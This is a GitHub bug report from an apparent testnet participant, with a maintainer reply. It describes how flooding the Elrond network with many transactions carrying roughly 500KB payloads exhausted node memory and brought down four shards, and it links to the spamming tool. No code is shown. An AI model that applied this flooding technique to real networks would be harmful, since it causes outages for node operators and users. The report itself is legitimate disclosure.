Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Mass tx spam results in nodes using an excessive amount of memory (and eventually getting OOM reaped) #799

Closed
chainum opened this issue Dec 12, 2019 · 1 comment
Assignees
Labels
type:bug Something isn't working

Comments

@chainum
Copy link

chainum commented Dec 12, 2019

Describe the bug
I wrote a tx sender/spammer tool that sends a lot of transactions with massive tx payloads and I unleashed it very briefly on the network to test my code.

The payload was alternated between the 4chan Navy Seal copypasta (499,500 bytes) and a base64-encoded image of the legendary Mr Bubz (126,896 bytes). The larger payload (499,500 bytes) was primarily used for better effect.

Seems that minor testing of this tool was sufficient to bring down shard 0, 1, 2 and 3. Some of my nodes sent about 200-400mb/s of data while the tool was active.

What I'm assuming happened is that the combination of the sheer amount of transactions coupled with the large payloads lead nodes to use a massive amount of memory for their pending tx pools/queues. Eventually some nodes allocated way too much memory and the OS stepped in to OOM reap said nodes.

This eventually lead to some shards not being able to form the consensus because of too many nodes getting shut down / being offline. It also seems that some of Elrond's internal nodes also were affected / were OOM reaped because of the exploit.

This attack is very similar to what I also did on Harmony's Pangaea testnet.

To Reproduce
Steps to reproduce the behavior:

  1. See https://github.com/SebastianJ/elrond-tx-sender/ for usage instructions
  2. GIven that some code is currently hard-coded (a bit pressed on time to report this ASAP) some code changes might be needed. Will make the tool more configurable as soon as this ticket has been submitted.

Expected behavior
The network and nodes should clearly be able to cope with this better - ideally using some kind of throughput throttling or flood protection (which is already on the way or fully implemented I've heard - but not yet deployed on BoN)

@iulianpascalau
Copy link
Contributor

👍 great job creating such a tool! We are currently in heavy development with an anti-flooding capability component for the node. Can hardly wait to retest this when the patch is released.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
type:bug Something isn't working
Projects
None yet
Development

No branches or pull requests

3 participants